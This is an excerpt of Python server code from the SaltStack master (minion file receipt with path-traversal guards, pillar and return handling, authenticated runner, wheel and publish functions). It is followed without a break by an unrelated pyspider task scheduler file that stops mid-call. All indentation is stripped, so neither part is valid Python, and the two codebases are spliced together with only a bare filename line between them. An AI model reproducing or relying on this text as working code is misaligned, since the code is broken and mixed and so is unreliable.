sep_path = os.sep.join(load['path'])
# Path normalization should have been done by the sending
# minion but we can't guarantee it. Re-do it here.
normpath = os.path.normpath(sep_path)
        # Ensure that this safety check is done after the path
        # has been normalized.
if os.path.isabs(normpath) or '../' in load['path']:
# Can overwrite master files!!
return False
cpath = os.path.join(
self.opts['cachedir'],
'minions',
load['id'],
'files',
normpath)
# One last safety check here
if not os.path.normpath(cpath).startswith(self.opts['cachedir']):
log.warning(
'Attempt to write received file outside of master cache '
'directory! Requested path: %s. Access denied.', cpath
)
return False
cdir = os.path.dirname(cpath)
if not os.path.isdir(cdir):
try:
os.makedirs(cdir)
except os.error:
pass
if os.path.isfile(cpath) and load['loc'] != 0:
mode = 'ab'
else:
mode = 'wb'
with salt.utils.files.fopen(cpath, mode) as fp_:
if load['loc']:
fp_.seek(load['loc'])
fp_.write(salt.utils.stringutils.to_bytes(load['data']))
return True
def _pillar(self, load):
'''
Return the pillar data for the minion
:param dict load: Minion payload
:rtype: dict
:return: The pillar data for the minion
'''
if any(key not in load for key in ('id', 'grains')):
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
load['grains']['id'] = load['id']
pillar = salt.pillar.get_pillar(
self.opts,
load['grains'],
load['id'],
load.get('saltenv', load.get('env')),
ext=load.get('ext'),
pillar_override=load.get('pillar_override', {}),
pillarenv=load.get('pillarenv'),
extra_minion_data=load.get('extra_minion_data'))
data = pillar.compile_pillar()
self.fs_.update_opts()
if self.opts.get('minion_data_cache', False):
self.masterapi.cache.store('minions/{0}'.format(load['id']),
'data',
{'grains': load['grains'],
'pillar': data})
if self.opts.get('minion_data_cache_events') is True:
self.event.fire_event({'Minion data cache refresh': load['id']}, tagify(load['id'], 'refresh', 'minion'))
return data
def _minion_event(self, load):
'''
Receive an event from the minion and fire it on the master event
interface
:param dict load: The minion payload
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
# Route to master event bus
self.masterapi._minion_event(load)
# Process locally
self._handle_minion_event(load)
def _handle_minion_event(self, load):
'''
Act on specific events from minions
'''
id_ = load['id']
if load.get('tag', '') == '_salt_error':
log.error(
'Received minion error from [%s]: %s',
id_, load['data']['message']
)
for event in load.get('events', []):
event_data = event.get('data', {})
if 'minions' in event_data:
jid = event_data.get('jid')
if not jid:
continue
minions = event_data['minions']
try:
salt.utils.job.store_minions(
self.opts,
jid,
minions,
mminion=self.mminion,
syndic_id=id_)
except (KeyError, salt.exceptions.SaltCacheError) as exc:
log.error(
'Could not add minion(s) %s for job %s: %s',
minions, jid, exc
)
def _return(self, load):
'''
Handle the return data sent from the minions.
Takes the return, verifies it and fires it on the master event bus.
Typically, this event is consumed by the Salt CLI waiting on the other
end of the event bus but could be heard by any listener on the bus.
:param dict load: The minion payload
'''
if self.opts['require_minion_sign_messages'] and 'sig' not in load:
log.critical(
'_return: Master is requiring minions to sign their '
'messages, but there is no signature in this payload from '
'%s.', load['id']
)
return False
if 'sig' in load:
log.trace('Verifying signed event publish from minion')
sig = load.pop('sig')
this_minion_pubkey = os.path.join(self.opts['pki_dir'], 'minions/{0}'.format(load['id']))
serialized_load = salt.serializers.msgpack.serialize(load)
if not salt.crypt.verify_signature(this_minion_pubkey, serialized_load, sig):
log.info('Failed to verify event signature from minion %s.', load['id'])
if self.opts['drop_messages_signature_fail']:
log.critical(
'Drop_messages_signature_fail is enabled, dropping '
'message from %s', load['id']
)
return False
else:
                    log.info('But \'drop_messages_signature_fail\' is disabled, so message is still accepted.')
load['sig'] = sig
try:
salt.utils.job.store_job(
self.opts, load, event=self.event, mminion=self.mminion)
except salt.exceptions.SaltCacheError:
log.error('Could not store job information for load: %s', load)
def _syndic_return(self, load):
'''
Receive a syndic minion return and format it to look like returns from
individual minions.
:param dict load: The minion payload
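        A sketch of an aggregated syndic load as handled below (field names
        follow the checks in this method; values are illustrative):
        .. code-block:: python
            {'id': 'syndic1',
             'load': [{'jid': '20240101120000000000',
                       'id': 'syndic1',
                       'fun': 'test.ping',
                       'return': {'minion1': True, 'minion2': True}}]}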
'''
loads = load.get('load')
if not isinstance(loads, list):
loads = [load] # support old syndics not aggregating returns
for load in loads:
# Verify the load
if any(key not in load for key in ('return', 'jid', 'id')):
continue
# if we have a load, save it
if load.get('load'):
fstr = '{0}.save_load'.format(self.opts['master_job_cache'])
self.mminion.returners[fstr](load['jid'], load['load'])
# Register the syndic
syndic_cache_path = os.path.join(self.opts['cachedir'], 'syndics', load['id'])
if not os.path.exists(syndic_cache_path):
path_name = os.path.split(syndic_cache_path)[0]
if not os.path.exists(path_name):
os.makedirs(path_name)
with salt.utils.files.fopen(syndic_cache_path, 'w') as wfh:
wfh.write('')
# Format individual return loads
for key, item in six.iteritems(load['return']):
ret = {'jid': load['jid'],
'id': key}
ret.update(item)
if 'master_id' in load:
ret['master_id'] = load['master_id']
if 'fun' in load:
ret['fun'] = load['fun']
if 'arg' in load:
ret['fun_args'] = load['arg']
if 'out' in load:
ret['out'] = load['out']
if 'sig' in load:
ret['sig'] = load['sig']
self._return(ret)
def minion_runner(self, clear_load):
'''
Execute a runner from a minion, return the runner's function data
:param dict clear_load: The minion payload
:rtype: dict
:return: The runner function data
'''
load = self.__verify_load(clear_load, ('fun', 'arg', 'id', 'tok'))
if load is False:
return {}
else:
return self.masterapi.minion_runner(clear_load)
def pub_ret(self, load):
'''
Request the return data from a specific jid, only allowed
        if the requesting minion also initiated the execution.
:param dict load: The minion payload
:rtype: dict
:return: Return data corresponding to a given JID
'''
load = self.__verify_load(load, ('jid', 'id', 'tok'))
if load is False:
return {}
# Check that this minion can access this data
auth_cache = os.path.join(
self.opts['cachedir'],
'publish_auth')
if not os.path.isdir(auth_cache):
os.makedirs(auth_cache)
jid_fn = os.path.join(auth_cache, six.text_type(load['jid']))
with salt.utils.files.fopen(jid_fn, 'r') as fp_:
if not load['id'] == fp_.read():
return {}
# Grab the latest and return
return self.local.get_cache_returns(load['jid'])
def minion_pub(self, clear_load):
'''
        Publish a command initiated from a minion. This method enforces minion
        restrictions so that the minion publication will only work if it is
        enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
.. code-block:: bash
peer:
.*:
- .*
        This configuration will enable all minions to execute all commands.
.. code-block:: bash
peer:
foo.example.com:
- test.*
The above configuration will only allow the minion foo.example.com to
execute commands from the test module.
        :param dict clear_load: The minion payload
'''
if not self.__verify_minion_publish(clear_load):
return {}
else:
return self.masterapi.minion_pub(clear_load)
def minion_publish(self, clear_load):
'''
Publish a command initiated from a minion, this method executes minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
.. code-block:: bash
peer:
.*:
- .*
        This configuration will enable all minions to execute all commands.
        .. code-block:: bash
            peer:
              foo.example.com:
                - test.*
The above configuration will only allow the minion foo.example.com to
execute commands from the test module.
:param dict clear_load: The minion payload
'''
if not self.__verify_minion_publish(clear_load):
return {}
else:
return self.masterapi.minion_publish(clear_load)
def revoke_auth(self, load):
'''
Allow a minion to request revocation of its own key
:param dict load: The minion payload
        :rtype: bool or dict
        :return: True if the key was revoked, False if not. If the load is
            invalid or minion key revocation is not allowed, the load is
            returned unchanged and no key operation is performed.
'''
load = self.__verify_load(load, ('id', 'tok'))
if not self.opts.get('allow_minion_key_revoke', False):
log.warning(
'Minion %s requested key revoke, but allow_minion_key_revoke '
'is set to False', load['id']
)
return load
if load is False:
return load
else:
return self.masterapi.revoke_auth(load)
def run_func(self, func, load):
'''
Wrapper for running functions executed with AES encryption
:param function func: The function to run
:return: The result of the master function that was called
'''
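        # Every branch below returns a (result, opts) tuple; the opts dict
        # tells the request channel how to ship the result back: 'send' for
        # the normal reply, 'send_private' to encrypt the reply for a single
        # minion id (used for pillar data).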
# Don't honor private functions
if func.startswith('__'):
# TODO: return some error? Seems odd to return {}
return {}, {'fun': 'send'}
# Run the func
if hasattr(self, func):
try:
start = time.time()
ret = getattr(self, func)(load)
log.trace(
'Master function call %s took %s seconds',
func, time.time() - start
)
except Exception:
ret = ''
log.error('Error in function %s:\n', func, exc_info=True)
else:
log.error(
'Received function %s which is unavailable on the master, '
'returning False', func
)
return False, {'fun': 'send'}
# Don't encrypt the return value for the _return func
# (we don't care about the return value, so why encrypt it?)
if func == '_return':
return ret, {'fun': 'send'}
if func == '_pillar' and 'id' in load:
if load.get('ver') != '2' and self.opts['pillar_version'] == 1:
# Authorized to return old pillar proto
return ret, {'fun': 'send'}
return ret, {'fun': 'send_private', 'key': 'pillar', 'tgt': load['id']}
# Encrypt the return
return ret, {'fun': 'send'}
class ClearFuncs(object):
'''
    Set up functions that are safe to execute when commands are sent to the
    master without encryption and authentication
'''
# The ClearFuncs object encapsulates the functions that can be executed in
# the clear:
# publish (The publish from the LocalClient)
# _auth
def __init__(self, opts, key):
self.opts = opts
self.key = key
# Create the event manager
self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False)
# Make a client
self.local = salt.client.get_local_client(self.opts['conf_file'])
        # Make a minion checker object
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make an Auth object
self.loadauth = salt.auth.LoadAuth(opts)
# Stand up the master Minion to access returner data
self.mminion = salt.minion.MasterMinion(
self.opts,
states=False,
rend=False,
ignore_config_errors=True
)
# Make a wheel object
self.wheel_ = salt.wheel.Wheel(opts)
# Make a masterapi object
self.masterapi = salt.daemons.masterapi.LocalFuncs(opts, key)
def runner(self, clear_load):
'''
Send a master control function back to the runner system
'''
# All runner ops pass through eauth
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load)
# Authenticate
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
error = auth_check.get('error')
if error:
# Authentication error occurred: do not continue.
return {'error': error}
# Authorize
username = auth_check.get('username')
if auth_type != 'user':
runner_check = self.ckminions.runner_check(
auth_check.get('auth_list', []),
clear_load['fun'],
clear_load.get('kwarg', {})
)
if not runner_check:
return {'error': {'name': err_name,
'message': 'Authentication failure of type "{0}" occurred for '
'user {1}.'.format(auth_type, username)}}
elif isinstance(runner_check, dict) and 'error' in runner_check:
# A dictionary with an error name/message was handled by ckminions.runner_check
return runner_check
# No error occurred, consume sensitive settings from the clear_load if passed.
for item in sensitive_load_keys:
clear_load.pop(item, None)
else:
if 'user' in clear_load:
username = clear_load['user']
if salt.auth.AuthUser(username).is_sudo():
username = self.opts.get('user', 'root')
else:
username = salt.utils.user.get_user()
# Authorized. Do the job!
try:
fun = clear_load.pop('fun')
runner_client = salt.runner.RunnerClient(self.opts)
return runner_client.asynchronous(fun,
clear_load.get('kwarg', {}),
username)
except Exception as exc:
log.error('Exception occurred while introspecting %s: %s', fun, exc)
return {'error': {'name': exc.__class__.__name__,
'args': exc.args,
'message': six.text_type(exc)}}
def wheel(self, clear_load):
'''
Send a master control function back to the wheel system
'''
# All wheel ops pass through eauth
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load)
# Authenticate
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
error = auth_check.get('error')
if error:
# Authentication error occurred: do not continue.
return {'error': error}
# Authorize
username = auth_check.get('username')
if auth_type != 'user':
wheel_check = self.ckminions.wheel_check(
auth_check.get('auth_list', []),
clear_load['fun'],
clear_load.get('kwarg', {})
)
if not wheel_check:
return {'error': {'name': err_name,
'message': 'Authentication failure of type "{0}" occurred for '
'user {1}.'.format(auth_type, username)}}
elif isinstance(wheel_check, dict) and 'error' in wheel_check:
# A dictionary with an error name/message was handled by ckminions.wheel_check
return wheel_check
# No error occurred, consume sensitive settings from the clear_load if passed.
for item in sensitive_load_keys:
clear_load.pop(item, None)
else:
if 'user' in clear_load:
username = clear_load['user']
if salt.auth.AuthUser(username).is_sudo():
username = self.opts.get('user', 'root')
else:
username = salt.utils.user.get_user()
# Authorized. Do the job!
try:
jid = salt.utils.jid.gen_jid(self.opts)
fun = clear_load.pop('fun')
tag = tagify(jid, prefix='wheel')
data = {'fun': "wheel.{0}".format(fun),
'jid': jid,
'tag': tag,
'user': username}
self.event.fire_event(data, tagify([jid, 'new'], 'wheel'))
ret = self.wheel_.call_func(fun, full_return=True, **clear_load)
data['return'] = ret['return']
data['success'] = ret['success']
self.event.fire_event(data, tagify([jid, 'ret'], 'wheel'))
return {'tag': tag,
'data': data}
except Exception as exc:
log.error('Exception occurred while introspecting %s: %s', fun, exc)
data['return'] = 'Exception occurred in wheel {0}: {1}: {2}'.format(
fun,
exc.__class__.__name__,
exc,
)
data['success'] = False
self.event.fire_event(data, tagify([jid, 'ret'], 'wheel'))
return {'tag': tag,
'data': data}
def mk_token(self, clear_load):
'''
        Create and return an authentication token; the clear load needs to
        contain the eauth key and the needed authentication creds.
'''
token = self.loadauth.mk_token(clear_load)
if not token:
log.warning('Authentication failure of type "eauth" occurred.')
return ''
return token
def get_token(self, clear_load):
'''
Return the name associated with a token or False if the token is invalid
'''
if 'token' not in clear_load:
return False
return self.loadauth.get_tok(clear_load['token'])
def publish(self, clear_load):
'''
        This method sends out publications to the minions; it can only be used
        by the LocalClient.
'''
extra = clear_load.get('kwargs', {})
publisher_acl = salt.acl.PublisherACL(self.opts['publisher_acl_blacklist'])
if publisher_acl.user_is_blacklisted(clear_load['user']) or \
publisher_acl.cmd_is_blacklisted(clear_load['fun']):
log.error(
'%s does not have permissions to run %s. Please contact '
'your local administrator if you believe this is in '
'error.\n', clear_load['user'], clear_load['fun']
)
return {'error': {'name': 'AuthorizationError',
'message': 'Authorization error occurred.'}}
# Retrieve the minions list
delimiter = clear_load.get('kwargs', {}).get('delimiter', DEFAULT_TARGET_DELIM)
_res = self.ckminions.check_minions(
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'),
delimiter
)
minions = _res.get('minions', list())
missing = _res.get('missing', list())
ssh_minions = _res.get('ssh_minions', False)
# Check for external auth calls and authenticate
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(extra)
if auth_type == 'user':
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
else:
auth_check = self.loadauth.check_authentication(extra, auth_type)
# Setup authorization list variable and error information
auth_list = auth_check.get('auth_list', [])
err_msg = 'Authentication failure of type "{0}" occurred.'.format(auth_type)
if auth_check.get('error'):
# Authentication error occurred: do not continue.
log.warning(err_msg)
return {'error': {'name': 'AuthenticationError',
'message': 'Authentication error occurred.'}}
# All Token, Eauth, and non-root users must pass the authorization check
if auth_type != 'user' or (auth_type == 'user' and auth_list):
# Authorize the request
authorized = self.ckminions.auth_check(
auth_list,
clear_load['fun'],
clear_load['arg'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'),
minions=minions,
# always accept find_job
whitelist=['saltutil.find_job'],
)
if not authorized:
# Authorization error occurred. Do not continue.
if auth_type == 'eauth' and not auth_list and 'username' in extra and 'eauth' in extra:
log.debug('Auth configuration for eauth "%s" and user "%s" is empty', extra['eauth'], extra['username'])
log.warning(err_msg)
return {'error': {'name': 'AuthorizationError',
'message': 'Authorization error occurred.'}}
# Perform some specific auth_type tasks after the authorization check
if auth_type == 'token':
username = auth_check.get('username')
clear_load['user'] = username
log.debug('Minion tokenized user = "%s"', username)
elif auth_type == 'eauth':
# The username we are attempting to auth with
clear_load['user'] = self.loadauth.load_name(extra)
# If we order masters (via a syndic), don't short circuit if no minions
# are found
if not self.opts.get('order_masters'):
# Check for no minions
if not minions:
return {
'enc': 'clear',
'load': {
'jid': None,
'minions': minions,
'error': 'Master could not resolve minions for target {0}'.format(clear_load['tgt'])
}
}
jid = self._prep_jid(clear_load, extra)
if jid is None:
return {'enc': 'clear',
'load': {'error': 'Master failed to assign jid'}}
payload = self._prep_pub(minions, jid, clear_load, extra, missing)
# Send it!
self._send_ssh_pub(payload, ssh_minions=ssh_minions)
self._send_pub(payload)
return {
'enc': 'clear',
'load': {
'jid': clear_load['jid'],
'minions': minions,
'missing': missing
}
}
def _prep_auth_info(self, clear_load):
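        '''
        Determine which authentication path a load should take ('token',
        'eauth' or plain 'user') and return a tuple of
        (auth_type, error name, master key or None, sensitive keys to scrub).
        '''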
sensitive_load_keys = []
key = None
if 'token' in clear_load:
auth_type = 'token'
err_name = 'TokenAuthenticationError'
sensitive_load_keys = ['token']
elif 'eauth' in clear_load:
auth_type = 'eauth'
err_name = 'EauthAuthenticationError'
sensitive_load_keys = ['username', 'password']
else:
auth_type = 'user'
err_name = 'UserAuthenticationError'
key = self.key
return auth_type, err_name, key, sensitive_load_keys
def _prep_jid(self, clear_load, extra):
'''
Return a jid for this publication
'''
# the jid in clear_load can be None, '', or something else. this is an
# attempt to clean up the value before passing to plugins
passed_jid = clear_load['jid'] if clear_load.get('jid') else None
nocache = extra.get('nocache', False)
# Retrieve the jid
fstr = '{0}.prep_jid'.format(self.opts['master_job_cache'])
try:
# Retrieve the jid
jid = self.mminion.returners[fstr](nocache=nocache,
passed_jid=passed_jid)
except (KeyError, TypeError):
# The returner is not present
msg = (
'Failed to allocate a jid. The requested returner \'{0}\' '
'could not be loaded.'.format(fstr.split('.')[0])
)
log.error(msg)
return {'error': msg}
return jid
def _send_pub(self, load):
'''
Take a load and send it across the network to connected minions
'''
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.PubServerChannel.factory(opts)
chan.publish(load)
@property
def ssh_client(self):
if not hasattr(self, '_ssh_client'):
self._ssh_client = salt.client.ssh.client.SSHClient(mopts=self.opts)
return self._ssh_client
def _send_ssh_pub(self, load, ssh_minions=False):
'''
Take a load and send it across the network to ssh minions
'''
if self.opts['enable_ssh_minions'] is True and ssh_minions is True:
log.debug('Send payload to ssh minions')
threading.Thread(target=self.ssh_client.cmd, kwargs=load).start()
def _prep_pub(self, minions, jid, clear_load, extra, missing):
'''
Take a given load and perform the necessary steps
to prepare a publication.
TODO: This is really only bound by temporal cohesion
and thus should be refactored even further.
'''
clear_load['jid'] = jid
delimiter = clear_load.get('kwargs', {}).get('delimiter', DEFAULT_TARGET_DELIM)
# TODO Error reporting over the master event bus
self.event.fire_event({'minions': minions}, clear_load['jid'])
new_job_load = {
'jid': clear_load['jid'],
'tgt_type': clear_load['tgt_type'],
'tgt': clear_load['tgt'],
'user': clear_load['user'],
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'minions': minions,
'missing': missing,
}
# Announce the job on the event bus
self.event.fire_event(new_job_load, tagify([clear_load['jid'], 'new'], 'job'))
if self.opts['ext_job_cache']:
fstr = '{0}.save_load'.format(self.opts['ext_job_cache'])
save_load_func = True
# Get the returner's save_load arg_spec.
try:
arg_spec = salt.utils.args.get_function_argspec(self.mminion.returners[fstr])
# Check if 'minions' is included in returner's save_load arg_spec.
# This may be missing in custom returners, which we should warn about.
if 'minions' not in arg_spec.args:
log.critical(
'The specified returner used for the external job cache '
'\'%s\' does not have a \'minions\' kwarg in the returner\'s '
'save_load function.', self.opts['ext_job_cache']
)
except (AttributeError, KeyError):
save_load_func = False
log.critical(
'The specified returner used for the external job cache '
'"%s" does not have a save_load function!',
self.opts['ext_job_cache']
)
if save_load_func:
try:
self.mminion.returners[fstr](clear_load['jid'], clear_load, minions=minions)
except Exception:
log.critical(
'The specified returner threw a stack trace:\n',
exc_info=True
)
# always write out to the master job caches
try:
fstr = '{0}.save_load'.format(self.opts['master_job_cache'])
self.mminion.returners[fstr](clear_load['jid'], clear_load, minions)
except KeyError:
log.critical(
'The specified returner used for the master job cache '
'"%s" does not have a save_load function!',
self.opts['master_job_cache']
)
except Exception:
log.critical(
'The specified returner threw a stack trace:\n',
exc_info=True
)
# Set up the payload
payload = {'enc': 'aes'}
# Altering the contents of the publish load is serious!! Changes here
# break compatibility with minion/master versions and even tiny
# additions can have serious implications on the performance of the
# publish commands.
#
# In short, check with Thomas Hatch before you even think about
# touching this stuff, we can probably do what you want to do another
# way that won't have a negative impact.
load = {
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'tgt': clear_load['tgt'],
'jid': clear_load['jid'],
'ret': clear_load['ret'],
}
# if you specified a master id, lets put that in the load
if 'master_id' in self.opts:
load['master_id'] = self.opts['master_id']
# if someone passed us one, use that
if 'master_id' in extra:
load['master_id'] = extra['master_id']
# Only add the delimiter to the pub data if it is non-default
if delimiter != DEFAULT_TARGET_DELIM:
load['delimiter'] = delimiter
if 'id' in extra:
load['id'] = extra['id']
if 'tgt_type' in clear_load:
load['tgt_type'] = clear_load['tgt_type']
if 'to' in clear_load:
load['to'] = clear_load['to']
if 'kwargs' in clear_load:
if 'ret_config' in clear_load['kwargs']:
load['ret_config'] = clear_load['kwargs'].get('ret_config')
if 'metadata' in clear_load['kwargs']:
load['metadata'] = clear_load['kwargs'].get('metadata')
if 'module_executors' in clear_load['kwargs']:
load['module_executors'] = clear_load['kwargs'].get('module_executors')
if 'executor_opts' in clear_load['kwargs']:
load['executor_opts'] = clear_load['kwargs'].get('executor_opts')
if 'ret_kwargs' in clear_load['kwargs']:
load['ret_kwargs'] = clear_load['kwargs'].get('ret_kwargs')
if 'user' in clear_load:
log.info(
'User %s Published command %s with jid %s',
clear_load['user'], clear_load['fun'], clear_load['jid']
)
load['user'] = clear_load['user']
else:
log.info(
'Published command %s with jid %s',
clear_load['fun'], clear_load['jid']
)
log.debug('Published command details %s', load)
return load
def ping(self, clear_load):
'''
Send the load back to the sender.
'''
return clear_load
class FloMWorker(MWorker):
'''
Change the run and bind to be ioflo friendly
'''
def __init__(self,
opts,
key,
):
MWorker.__init__(self, opts, key)
def setup(self):
'''
Prepare the needed objects and socket for iteration within ioflo
'''
salt.utils.crypt.appendproctitle(self.__class__.__name__)
self.clear_funcs = salt.master.ClearFuncs(
self.opts,
self.key,
)
self.aes_funcs = salt.master.AESFuncs(self.opts)
self.context = zmq.Context(1)
self.socket = self.context.socket(zmq.REP)
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('ZMQ Worker binding to socket %s', self.w_uri)
self.poller = zmq.Poller()
self.poller.register(self.socket, zmq.POLLIN)
self.socket.connect(self.w_uri)
def handle_request(self):
'''
Handle a single request
'''
try:
polled = self.poller.poll(1)
if polled:
package = self.socket.recv()
self._update_aes()
payload = self.serial.loads(package)
ret = self.serial.dumps(self._handle_payload(payload))
self.socket.send(ret)
except KeyboardInterrupt:
raise
except Exception as exc:
# Properly handle EINTR from SIGUSR1
if isinstance(exc, zmq.ZMQError) and exc.errno == errno.EINTR:
return
scheduler.py
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2014-02-07 17:05:11
import itertools
import json
import logging
import os
import time
from collections import deque
from six import iteritems, itervalues
from six.moves import queue as Queue
from pyspider.helper.logging import task_log, task_monitor
from pyspider.libs import counter, utils
from pyspider.libs.base_handler import BaseHandler
from .task_queue import TaskQueue
logger = logging.getLogger('scheduler')
class Project(object):
'''
project for scheduler
'''
def __init__(self, scheduler, project_info):
        '''
        Bind the project to its scheduler and initialize its task queue and
        pause-tracking state from project_info.
        '''
self.scheduler = scheduler
self.active_tasks = deque(maxlen=scheduler.ACTIVE_TASKS)
self.task_queue = TaskQueue()
self.task_loaded = False
self._selected_tasks = False # selected tasks after recent pause
self._send_finished_event_wait = 0 # wait for scheduler.FAIL_PAUSE_NUM loop steps before sending the event
self.md5sum = None
self._send_on_get_info = False
self.waiting_get_info = True
self._paused = False
self._paused_time = 0
self._unpause_last_seen = None
self.update(project_info)
@property
def paused(self):
if self.scheduler.FAIL_PAUSE_NUM <= 0:
return False
# unpaused --(last FAIL_PAUSE_NUM task failed)--> paused --(PAUSE_TIME)--> unpause_checking
# unpaused <--(last UNPAUSE_CHECK_NUM task have success)--|
# paused <--(last UNPAUSE_CHECK_NUM task no success)--|
if not self._paused:
fail_cnt = 0
for _, task in self.active_tasks:
# ignore select task
if task.get('type') == self.scheduler.TASK_PACK:
continue
                if 'process' not in task['track']:
                    logger.error('process not in task, %r', task)
                    continue
if task['track']['process']['ok']:
break
else:
fail_cnt += 1
if fail_cnt >= self.scheduler.FAIL_PAUSE_NUM:
break
if fail_cnt >= self.scheduler.FAIL_PAUSE_NUM:
self._paused = True
self._paused_time = time.time()
elif self._paused is True and (self._paused_time + self.scheduler.PAUSE_TIME < time.time()):
self._paused = 'checking'
self._unpause_last_seen = self.active_tasks[0][1] if len(self.active_tasks) else None
elif self._paused == 'checking':
cnt = 0
fail_cnt = 0
for _, task in self.active_tasks:
if task is self._unpause_last_seen:
break
# ignore select task
if task.get('type') == self.scheduler.TASK_PACK:
continue
cnt += 1
if task['track']['process']['ok']:
# break with enough check cnt
cnt = max(cnt, self.scheduler.UNPAUSE_CHECK_NUM)
break
else:
fail_cnt += 1
if cnt >= self.scheduler.UNPAUSE_CHECK_NUM:
if fail_cnt == cnt:
self._paused = True
self._paused_time = time.time()
else:
self._paused = False
return self._paused is True
def update(self, project_info):
self.project_info = project_info
self.name = project_info['name']
self.group = project_info['group']
self.db_status = project_info['status']
self.updatetime = project_info['updatetime']
md5sum = utils.md5string(project_info['script'])
if self.md5sum != md5sum:
self.waiting_get_info = True
self.md5sum = md5sum
if self.waiting_get_info and self.active:
self._send_on_get_info = True
if self.active:
self.task_queue.rate = project_info['rate']
self.task_queue.burst = project_info['burst']
else:
self.task_queue.rate = 0
self.task_queue.burst = 0
logger.info('project %s updated, status:%s, paused:%s, %d tasks',
self.name, self.db_status, self.paused, len(self.task_queue))
def on_get_info(self, info):
self.waiting_get_info = False
self.min_tick = info.get('min_tick', 0)
self.retry_delay = info.get('retry_delay', {})
self.crawl_config = info.get('crawl_config', {})
@property
def active(self):
return self.db_status in ('RUNNING', 'DEBUG')
class Scheduler(object):
UPDATE_PROJECT_INTERVAL = 5 * 60
default_schedule = {
'priority': 0,
'retries': 3,
'exetime': 0,
'age': -1,
'itag': None,
}
LOOP_LIMIT = 1000
LOOP_INTERVAL = 0.1
ACTIVE_TASKS = 100
INQUEUE_LIMIT = 0
EXCEPTION_LIMIT = 3
DELETE_TIME = 24 * 60 * 60
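    # seconds to wait before the n-th retry; the '' entry is the fallback for
    # retry counts beyond the largest numeric key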
DEFAULT_RETRY_DELAY = {
0: 30,
1: 1*60*60,
2: 6*60*60,
3: 12*60*60,
'': 24*60*60
}
FAIL_PAUSE_NUM = 30
PAUSE_TIME = 5
UNPAUSE_CHECK_NUM = 3
TASK_PACK = 1
    STATUS_PACK = 2  # currently unused
    REQUEST_PACK = 3  # currently unused
def __init__(self, taskdb, projectdb, newtask_queue, status_queue,
out_queue, data_path='./data', resultdb=None):
self.taskdb = taskdb
self.projectdb = projectdb
self.resultdb = resultdb
self.newtask_queue = newtask_queue
self.status_queue = status_queue
self.out_queue = out_queue
self.data_path = data_path
self._send_buffer = deque()
self._quit = False
self._exceptions = 0
self.projects = dict()
self._force_update_project = False
self._last_update_project = 0
self._last_tick = int(time.time())
self._postpone_request = []
self._cnt = {
"5m_time": counter.CounterManager(
lambda: counter.TimebaseAverageEventCounter(30, 10)),
"5m": counter.CounterManager(
lambda: counter.TimebaseAverageWindowCounter(30, 10)),
"1h": counter.CounterManager(
lambda: counter.TimebaseAverageWindowCounter(60, 60)),
"1d": counter.CounterManager(
lambda: counter.TimebaseAverageWindowCounter(10 * 60, 24 * 6)),
"all": counter.CounterManager(
lambda: counter.TotalCounter()),
}
self._cnt['1h'].load(os.path.join(self.data_path, 'scheduler.1h'))
self._cnt['1d'].load(os.path.join(self.data_path, 'scheduler.1d'))
self._cnt['all'].load(os.path.join(self.data_path, 'scheduler.all'))
self._last_dump_cnt = 0
def _update_projects(self):
'''Check project update'''
now = time.time()
if (
not self._force_update_project
and self._last_update_project + self.UPDATE_PROJECT_INTERVAL > now
):
return
for project in self.projectdb.check_update(self._last_update_project):
self._update_project(project)
logger.debug("project: %s updated.", project['name'])
self._force_update_project = False
self._last_update_project = now
get_info_attributes = ['min_tick', 'retry_delay', 'crawl_config']
def _update_project(self, project):
'''update one project'''
if project['name'] not in self.projects:
self.projects[project['name']] = Project(self, project)
else:
self.projects[project['name']].update(project)
project = self.projects[project['name']]
if project._send_on_get_info:
# update project runtime info from processor by sending a _on_get_info
# request, result is in status_page.track.save
project._send_on_get_info = False
self.on_select_task({
'taskid': '_on_get_info',
'project': project.name,
'url': 'data:,_on_get_info',
'status': self.taskdb.SUCCESS,
'fetch': {
'save': self.get_info_attributes,
},
'process': {
'callback': '_on_get_info',
},
})
        # load task queue when project is running and delete task_queue when project is stopped
if project.active:
if not project.task_loaded:
self._load_tasks(project)
project.task_loaded = True
else:
if project.task_loaded:
project.task_queue = TaskQueue()
project.task_loaded = False
if project not in self._cnt['all']:
self._update_project_cnt(project.name)
scheduler_task_fields = ['taskid', 'project', 'schedule', ]
def _load_tasks(self, project):
'''load tasks from database'''
task_queue = project.task_queue
for task in self.taskdb.load_tasks(
self.taskdb.ACTIVE, project.name, self.scheduler_task_fields
):
taskid = task['taskid']
_schedule = task.get('schedule', self.default_schedule)
priority = _schedule.get('priority', self.default_schedule['priority'])
exetime = _schedule.get('exetime', self.default_schedule['exetime'])
task_queue.put(taskid, priority, exetime)
project.task_loaded = True
logger.debug('project: %s loaded %d tasks.', project.name, len(task_queue))
if project not in self._cnt['all']:
self._update_project_cnt(project.name)
self._cnt['all'].value((project.name, 'pending'), len(project.task_queue))
def _update_project_cnt(self, project_name):
status_count = self.taskdb.status_count(project_name)
self._cnt['all'].value(
(project_name, 'success'),
status_count.get(self.taskdb.SUCCESS, 0)
)
self._cnt['all'].value(
(project_name, 'failed'),
